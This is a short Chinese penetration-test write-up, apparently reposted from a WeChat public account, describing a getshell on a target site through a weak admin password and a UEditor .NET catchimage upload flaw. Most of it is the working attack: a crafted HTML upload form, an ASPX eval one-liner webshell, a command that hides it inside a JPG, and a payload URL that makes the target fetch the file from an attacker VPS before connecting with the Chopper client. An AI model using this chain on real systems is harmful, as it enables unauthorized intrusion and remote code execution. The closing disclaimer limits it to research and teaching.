首先通过弱口令进入后台,在后台发现使用了ueditor编辑器,查看版本发现可能存在漏洞,通过访问指定的URL判断出存在漏洞。然后通过构造恶意的HTML表单,上传图片马,最后直接getshell。
一、弱口令进入后台
二、发现ueditor编辑器
0x01 发现ueditor编辑器
0x02 找到编辑器路径
0x03 查看ueditor版本
0x04 判断是否存在漏洞
http://xxxxxxxxx/ueditor/net/controller.ashx?action=catchimage
三、进行上传
0x01 构造一个恶意的HTML文件
<form action="http://xxx.xxx.xxx.xxx/Scripts/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>
0x02 构造一个aspx类型的一句话木马
<%@ page="" language="Jscript"><%eval(request.item["chopper"],"unsafe");%>
copy 1.jpg/b + 1.aspx/a 2.jpg
0x03 在VPS上开启一个HTTP服务
python2 -m SimpleHTTPServer 8000
0x04 利用HTML表单上传
http://vps:port/2.jpg?.aspx
四、使用菜刀进行连接
0x01 访问shell地址
0x02 使用菜刀成功连接
原文始发于微信公众号(想走安全的小白):记一次渗透实战--ueditor编辑器上传getshell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论